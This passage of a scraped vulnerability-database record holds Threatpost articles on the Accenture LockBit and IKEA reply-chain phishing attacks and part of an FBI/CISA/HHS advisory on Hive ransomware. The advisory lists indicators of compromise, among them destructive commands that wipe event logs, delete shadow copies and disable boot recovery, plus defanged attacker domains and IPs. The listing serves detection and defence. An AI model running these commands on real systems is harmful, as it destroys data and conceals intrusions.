networks.[#ransomware](<https://twitter.com/hashtag/ransomware?src=hash&ref_src=twsrc%5Etfw>) [#cyber](<https://twitter.com/hashtag/cyber?src=hash&ref_src=twsrc%5Etfw>) [#cybersecurity](<https://twitter.com/hashtag/cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) [#accenture](<https://twitter.com/hashtag/accenture?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/ZierqRVIjj](<https://t.co/ZierqRVIjj>)\n> \n> \u2014 Cyble (@AuCyble) [August 11, 2021](<https://twitter.com/AuCyble/status/1425391442248097792?ref_src=twsrc%5Etfw>)\n\nCyble said that LockBit claimed to have made off with databases of more than 6TB and that it demanded $50 million as ransom. The threat actors themselves alleged that this was an insider job, \u201cby someone who is still employed there,\u201d though Cyble called that \u201cunlikely.\u201d\n\nSources familiar with the attack told BleepingComputer that Accenture confirmed the ransomware attack to at least one computer telephony integration (CTI) vendor and that it\u2019s in the process of notifying more customers. According to a [tweet](<https://twitter.com/HRock/status/1425447533598453760?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1425447533598453760%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Faccenture-confirms-hack-after-lockbit-ransomware-data-leak-threats%2F>) from threat intelligence firm Hudson Rock, the attack compromised 2,500 computers used by employees and partners, leading the firm to suggest that \u201cthis information was certainly used by threat actors.\u201d\n\nIn a [security alert ](<https://www.cyber.gov.au/acsc/view-all-content/alerts/lockbit-20-ransomware-incidents-australia>)issued last week, the Australian Cyber Security Centre (ACSC) warned that LockBit 2.0 ransomware attacks against Australian organizations had started to rise last month, and that they were coupled with threats to publish data in what\u2019s known as [double-extortion attacks](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\n\u201cThis activity has occurred across multiple industry sectors,\u201d according to the alert. \u201cVictims have received demands for ransom payments. In addition to the encryption of data, victims have received threats that data stolen during the incidents will be published.\u201d\n\nThe ACSC noted ([PDF](<https://www.cyber.gov.au/sites/default/files/2021-08/2021-006%20ACSC%20Ransomware%20Profile%20-%20Lockbit%202.0.pdf>)) that it\u2019s recently observed LockBit threat actors actively exploiting existing vulnerabilities in the Fortinet FortiOS and FortiProxy products, identified as CVE-2018-13379, in order to gain initial access to specific victim networks. That vulnerability, a path-traversal flaw in the SSL VPN, has been exploited in multiple attacks over the years:\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that advanced persistent threat (APT) nation-state actors were actively exploiting it to gain a foothold within networks before moving laterally and carrying out recon, for example.\n\n## Known Vulnerability Exploited?\n\nRon Bradley, vice president of third-party risk-management firm Shared Assessments, told Threatpost on Wednesday that the Accenture incident is \u201ca prime example of the difference between business resiliency and business continuity. Business resiliency is like being in a boxing match, you take a body blow but can continue the fight. Business continuity comes into play when operations have ceased or severely impaired and you have to make major efforts to recover.\n\n\u201cThis particular example with Accenture is interesting in the fact that it was a known/published vulnerability,\u201d Bradley continued. It highlights the importance of making sure systems are properly patched in a timely manner. The ability for Accenture to manage the repercussions of potentially stolen data will be an important lesson for many organizations going forward.\u201d\n\nHitesh Sheth, president and CEO at the cybersecurity firm Vectra, said that all businesses should expect attacks like this, but particularly a global consultancy firm with links to so many companies.\n\n\u201cFirst reports suggest Accenture had data backup protocols in place and moved quickly to isolate affected servers,\u201d he told Threatpost on Wednesday. \u201cIt\u2019s too soon for an outside observer to assess damage. However, this is yet another reminder to businesses to scrutinize security standards at their vendors, partners, and providers. Every enterprise should expect attacks like this \u2013 perhaps especially a global consulting firm with links to so many other companies. It\u2019s how you anticipate, plan for and recover from attacks that counts.\u201d\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T21:56:00", "type": "threatpost", "title": "Accenture Confirms LockBit Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-08-11T21:56:00", "id": "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "href": "https://threatpost.com/accenture-lockbit-ransomware-attack/168594/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. \u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d the spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d____\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? Some say yes, some say no.\n\nErich Kron, security awareness advocate at [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkwmuP_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r2sgW-2Be451MnVYlMzEVQ43u-2Fx2JCoSpeITOcIPo6Gi3VBNSVcUaapZzArkSDh5SZ2Cih-2F-2FVdRBgHXCsqyWXs7po0-2FS83TsiYRB3U8HOgtt0HT6BGdSMjxi-2FVc6P1ZgVny6ZGKAKxbHvydLCfU5zrtFQ-3D>), is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. \u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\u201d\n\nIn contrast, Christian Espinosa, managing director of [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PeL3x_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r8Wex0T7OFTT8vFIbMA9T-2BlDgGhDFXEelC-2FWPjZXKe9NWtbBbYafHTvkVre5k1vKi3GgofOJKSR-2F2xlpyW7kQklpPEA59unEm4rAKnCodaK-2FrXGwLA5yk9gY1MBMzuyaJeG4mVY1yL-2F3YI1d-2BMmcWiY-3D>), is a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespite awareness campaigns, the transportation industry realized that many people did not \u2018look\u2019 before turning across traffic at a green light,\u201d Espinosa said. \u201cInstead of blaming the drivers, the industry changed the traffic lights. The newer lights prevent drivers from turning across traffic unless there is a green arrow.\u201d\n\nThis change saved thousands of lives, he said, and it\u2019s high time that the cybersecurity industry similarly \u201ctakes ownership.\u201d\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T21:22:12", "type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-12-06T17:07:02", "description": "### Summary\n\nActions to Take Today to Mitigate Cyber Threats from Ransomware:\n\n\u2022 Prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Enable and enforce multifactor authentication with strong passwords \n\u2022 Close unused ports and remove any application not deemed necessary for day-to-day operations.\n\n_Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit [stopransomware.gov](<https://www.cisa.gov/stopransomware>) to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.\n\nFBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.\n\nDownload the PDF version of this report: pdf, 852.9 kb.\n\nFor a downloadable copy of IOCs, see AA22-321A.stix (STIX, 43.6 kb).\n\n### Technical Details\n\n_Note: This advisory uses the MITRE ATT&amp;CK\u00ae for Enterprise framework, version 12. See [MITRE ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v12/matrices/enterprise/>) for all referenced tactics and techniques._\n\nAs of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom payments, according to FBI information. Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks. From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).\n\nThe method of initial intrusion will depend on which affiliate targets the network. Hive actors have gained initial access to victim networks by using single factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols [[T1133](<https://attack.mitre.org/versions/v12/techniques/T1133/>)]. In some cases, Hive actors have bypassed multifactor authentication (MFA) and gained access to FortiOS servers by exploiting Common Vulnerabilities and Exposures (CVE) [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>). This vulnerability enables a malicious cyber actor to log in without a prompt for the user\u2019s second authentication factor (FortiToken) when the actor changes the case of the username.\n\nHive actors have also gained initial access to victim networks by distributing phishing emails with malicious attachments [[T1566.001](<https://attack.mitre.org/versions/v12/techniques/T1566/001/>)] and by exploiting the following vulnerabilities against Microsoft Exchange servers [[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>)]:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) \\- Microsoft Exchange Server Privilege Escalation Vulnerability\n\nAfter gaining access, Hive ransomware attempts to evade detention by executing processes to:\n\n * Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption [[T1562](<https://attack.mitre.org/versions/v12/techniques/T1562/001/>)].\n * Stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or via PowerShell [[T1059](<https://attack.mitre.org/versions/v12/techniques/T1059/>)] [[T1490](<https://attack.mitre.org/versions/v12/techniques/T1490/>)].\n * Delete Windows event logs, specifically the System, Security and Application logs [[T1070](<https://attack.mitre.org/versions/v12/techniques/T1070/>)].\n\nPrior to encryption, Hive ransomware removes virus definitions and disables all portions of Windows Defender and other common antivirus programs in the system registry [[T1112](<https://attack.mitre.org/versions/v12/techniques/T1112/>)].\n\nHive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz [[T1537](<https://attack.mitre.org/versions/v12/techniques/T1537/>)]. In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.\n\nDuring the encryption process, a file named *.key (previously *.key.*) is created in the root directory (C:\\ or /root/). Required for decryption, this key file only exists on the machine where it was created and cannot be reproduced. The ransom note, HOW_TO_DECRYPT.txt is dropped into each affected directory and states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered [[T1486](<https://attack.mitre.org/versions/v12/techniques/T1486/>)]. The ransom note contains a \u201csales department\u201d .onion link accessible through a TOR browser, enabling victim organizations to contact the actors through a live chat panel to discuss payment for their files. However, some victims reported receiving phone calls or emails from Hive actors directly to discuss payment.\n\nThe ransom note also threatens victims that a public disclosure or leak site accessible on the TOR site, \u201cHiveLeaks\u201d, contains data exfiltrated from victim organizations who do not pay the ransom demand (see figure 1 below). Additionally, Hive actors have used anonymous file sharing sites to disclose exfiltrated data (see table 1 below).\n\n\n\n_Figure 1: Sample Hive Ransom Note_\n\n_Table 1: Anonymous File Sharing Sites Used to Disclose Data_\n\nhttps://anonfiles[.]com \n \n--- \n \nhttps://mega[.]nz \n \nhttps://send.exploit[.]in \n \nhttps://ufile[.]io \n \nhttps://www.sendspace[.]com \n \nhttps://privatlab[.]net \n \nhttps://privatlab[.]com \n \nOnce the victim organization contacts Hive actors on the live chat panel, Hive actors communicate the ransom amount and the payment deadline. Hive actors negotiate ransom demands in U.S. dollars, with initial amounts ranging from several thousand to millions of dollars. Hive actors demand payment in Bitcoin.\n\nHive actors have been known to reinfect\u2014with either Hive ransomware or another ransomware variant\u2014the networks of victim organizations who have restored their network without making a ransom payment.\n\n#### **Indicators of Compromise**\n\nThreat actors have leveraged the following IOCs during Hive ransomware compromises. Note: Some of these indicators are legitimate applications that Hive threat actors used to aid in further malicious exploitation. FBI, CISA, and HHS recommend removing any application not deemed necessary for day-to-day operations. See tables 2\u20133 below for IOCs obtained from FBI threat response investigations as recently as November 2022.\n\n_Table 2: Known IOCs as of November 2022_\n\nKnown IOCs - Files \n \n--- \n \nHOW_TO_DECRYPT.txt typically in directories with encrypted files \n \n*.key typically in the root directory, i.e., C:\\ or /root \n \nhive.bat \n \nshadow.bat \n \nasq.r77vh0[.]pw - Server hosted malicious HTA file \n \nasq.d6shiiwz[.]pw - Server referenced in malicious regsvr32 execution \n \nasq.swhw71un[.]pw - Server hosted malicious HTA file \n \nasd.s7610rir[.]pw - Server hosted malicious HTA file \n \nWindows_x64_encrypt.dll \n \nWindows_x64_encrypt.exe \n \nWindows_x32_encrypt.dll \n \nWindows_x32_encrypt.exe \n \nLinux_encrypt \n \nEsxi_encrypt \n \nKnown IOCs \u2013 Events \n \nSystem, Security and Application Windows event logs wiped \n \nMicrosoft Windows Defender AntiSpyware Protection disabled \n \nMicrosoft Windows Defender AntiVirus Protection disabled \n \nVolume shadow copies deleted \n \nNormal boot process prevented \n \nKnown IOCs \u2013 Logged Processes \n \nwevtutil.exe cl system \n \nwevtutil.exe cl security \n \nwevtutil.exe cl application \n \nvssadmin.exe delete shadows /all /quiet \n \nwmic.exe SHADOWCOPY /nointeractive \n \nwmic.exe shadowcopy delete \n \nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures \n \nbcdedit.exe /set {default} recoveryenabled no \n \n_Table 3: Potential IOC IP Addresses as of November 2022_ Note: Some of these observed IP addresses are more than a year old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action like blocking.\n\nPotential IOC IP Addresses for Compromise or Exfil: \n \n--- \n \n84.32.188[.]57\n\n| \n\n84.32.188[.]238 \n \n93.115.26[.]251\n\n| \n\n185.8.105[.]67 \n \n181.231.81[.]239\n\n| \n\n185.8.105[.]112 \n \n186.111.136[.]37\n\n| \n\n192.53.123[.]202 \n \n158.69.36[.]149\n\n| \n\n46.166.161[.]123 \n \n108.62.118[.]190\n\n| \n\n46.166.161[.]93 \n \n185.247.71[.]106\n\n| \n\n46.166.162[.]125 \n \n5.61.37[.]207\n\n| \n\n46.166.162[.]96 \n \n185.8.105[.]103\n\n| \n\n46.166.169[.]34 \n \n5.199.162[.]220\n\n| \n\n93.115.25[.]139 \n \n5.199.162[.]229\n\n| \n\n93.115.27[.]148 \n \n89.147.109[.]208\n\n| \n\n83.97.20[.]81 \n \n5.61.37[.]207\n\n| \n\n5.199.162[.]220 \n \n5.199.162[.]229;\n\n| \n\n46.166.161[.]93 \n \n46.166.161[.]123;\n\n| \n\n46.166.162[.]96 \n \n46.166.162[.]125\n\n| \n\n46.166.169[.]34 \n \n83.97.20[.]81\n\n| \n\n84.32.188[.]238 \n \n84.32.188[.]57\n\n| \n\n89.147.109[.]208 \n \n93.115.25[.]139;\n\n| \n\n93.115.26[.]251 \n \n93.115.27[.]148\n\n| \n\n108.62.118[.]190 \n \n158.69.36[.]149/span&gt;\n\n| \n\n181.231.81[.]239 \n \n185.8.105[.]67\n\n| \n\n185.8.105[.]103 \n \n185.8.105[.]112\n\n| \n\n185.247.71[.]106 \n \n186.111.136[.]37\n\n| \n\n192.53.123[.]202 \n \n#### **MITRE ATT&amp;CK TECHNIQUES**\n\nSee table 4 for all referenced threat actor tactics and techniques listed in this advisory.\n\nTable 4: Hive Actors ATT&amp;CK Techniques for Enterprise\n\n_Initial Access_ \n \n--- \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nExternal Remote Services\n\n| \n\n[T1133](<https://attack.mitre.org/versions/v12/techniques/T1133/>)\n\n| \n\nHive actors gain access to victim networks by using single factor logins via RDP, VPN, and other remote network connection protocols. \n \nExploit Public-Facing Application\n\n| \n\n[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>)\n\n| \n\nHive actors gain access to victim network by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321. \n \nPhishing\n\n| \n\n[T1566.001](<https://attack.mitre.org/versions/v12/techniques/T1566/001/>)\n\n| \n\nHive actors gain access to victim networks by distributing phishing emails with malicious attachments. \n \n_Execution_ \n 